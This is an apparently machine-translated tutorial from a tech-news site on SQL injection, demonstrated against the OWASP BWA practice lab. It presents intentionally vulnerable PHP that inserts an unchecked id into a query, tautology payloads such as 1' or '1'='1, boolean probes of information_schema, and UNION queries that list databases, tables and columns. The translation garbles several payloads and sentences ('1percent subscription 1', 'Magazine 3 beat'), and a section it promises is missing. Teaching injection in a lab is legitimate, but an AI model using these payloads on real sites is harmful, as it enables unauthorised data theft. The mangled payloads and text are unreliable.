Shulou(Shulou.com)05/31 Report--

This article mainly shows you the "sample analysis of SQL injection", which is easy to understand and clear. I hope it can help you solve your doubts. Let the editor lead you to study and learn the article "sample Analysis of SQL injection".

General idea of SQL injection attack

1. Find the location of SQL injection

two。 Determine the server type and background database type

3. SQL injection attacks against impassable servers and databases

About SQL Injection (SQL injection)

SQL Injection is to deceive the server or database to execute malicious SQL commands by inserting malicious SQL commands into the Web form.

To learn SQL injection, first of all to build a target environment, I use OWASP BWA, interested can go to the official website to download an installation, in addition to SQL injection, many target environment can be found in BWA, it is specially designed for OWASP ZAP penetration tools.

$id = $_ GET ['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id =' $id'"; $result = mysql_query ($getid) or die (''. Mysql_error (). ''); $num = mysql_numrows ($result)

This is a very simple PHP code that gets the value of id from the foreground, gives it to the database for execution, and returns the result to the foreground.

For example, enter id = 1 in OWASP, click Submit, and return the result as follows:

Anyone who knows a little bit about the background or database knows that there is a serious problem with the above code, and there is no judgment on the validity and legitimacy of the value of id. In other words, whatever we enter in the submit input box will be submitted to the database for execution, for example, enter 1'or'1 in the input box, and the execution will become:

/ / the command SELECT first_name that was originally executed in the database, last_name FROM users WHERE user_id = '1scratch / becomes SELECT first_name, last_name FROM users WHERE user_id =' 1' or '1percent subscription 1'

Pay attention to the single quotation marks, which is a very important part of the SQL injection, so at the end of the injection code add a '1percent quote 1 to close the single quotation marks.

Due to the execution of or, all the contents of the database table users are displayed.

The three main types of injection are described below.

Analysis of Boolean-based principle

First of all, we have to talk about AND and OR in SQL

AND and OR can combine two or more conditions in the WHERE clause.

AND: returns the record where both the first condition and the second condition hold.

OR: returns a record that meets the first or second condition.

AND and OR are the intersection and union in set theory.

The following is the query content of a database.

Mysql > select * from students;+-+ | id | name | age | +-+ | 10056 | Doris | 20 | 10058 | Jaune | 22 | 10060 | Alisa | 29 | +-+ 3 rows in set (sec)

1)

Mysql > select * from students where TRUE; +-+ | id | name | age | +-+ | 10056 | Doris | 20 | 10058 | Jaune | 22 | 10060 | Alisa | 29 | +-+ 3 rows in set (sec)

2)

Mysql > select * from students where FALSE; Empty set (0.00 sec)

3)

Mysql > SELECT * from students where id = 10056 and TRUE; +-+ | id | name | age | +-+ | 10056 | Doris | 20 | +-+ 1 row in set (sec)

4)

Mysql > select * from students where id = 10056 and FALSE; Empty set (0.00 sec)

5)

Mysql > selcet * from students where id = 10056 or TRUE; +-+ | id | name | age | +-+ | 10056 | Doris | 20 | 10058 | Jaune | 22 | 10060 | Alisa | 29 | +-+ 3 rows in set (0.00 sec)

6)

Mysql > select * from students where id = 10056 or FALSE; +-+ | id | name | age | +-+ | 10056 | Doris | 20 | +-+ 1 row in set (sec)

It will be found that and 1 and and 1 are variants of and TRUE and and FALSE.

This is the most basic boolean injection, on which you are free to combine statements.

Dictionary blow up flow

And exists (select * from) /? The guessed table name and exists (select? From x) / /? For the guessed column name

Intercept two shunts

And (length ((select schema_name from information_schema.schemata limit 1)) >?) / / judge the length of the database name and (substr ((select schema_name from information_schema.schemata limit 1), 1 union select schema_name from information_schema.schemata) >'?') and (substr ((select schema_name from information_schema.schemata limit 1), 1) select name from students where id =-1 union select schema_name from information_schema.schemata / / Database name +-+ | name | +-+ | information_schema | | mysql | | performance_schema | | rumRaisin | | t3st | | test | +-+ 6 rows in set (0.00 sec)

2)

Mysql > select name from students where id =-1 union select table_name from information_schema.tables where table_schema='t3st'; / / Table name +-+ | name | +-+ | master | | students | +-+ 2 rows in set (0.00 sec)

3)

Mysql > select name from students where id =-1 union select column_name from information_schema.columns where table_name = 'students'; / / column name +-+ | name | +-+ | id | | name | | age | +-+ 3 rows in set (0.00 sec)

The UNION operator is used to merge the result sets of two or more SELECT statements. Note that SELECT statements within UNION must have the same number of columns. Columns must also have similar data types. At the same time, the columns in each SELECT statement must be in the same order.

For example, based on the original OWASP, two values are returned: first_name and sur_name. It is conceivable that when the server returns the query results of the database, it will pass the first and second values of the results to first_name and sur_name, more or less, will cause an error.

So if you want to use a union query for injection, you first have to guess how many columns are queried in the back-end query and which columns can be echoed to the user.

Guess the number of columns

-1 union select 1-1 union select 1 union select 2-1 union select 1 Magazine 3 beat / until the page is displayed normally

For example, this sentence

-1 UNION SELECT 1, 2, 3, 4

If the values displayed are 3 and 4, there are four columns in the query results, and the third and fourth columns are useful. Then the corresponding construction union statement is as follows

-1 UNION SELECT 1 UNION SELECT 2 username FROM table above is all the content of this article "sample Analysis of SQL injection". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.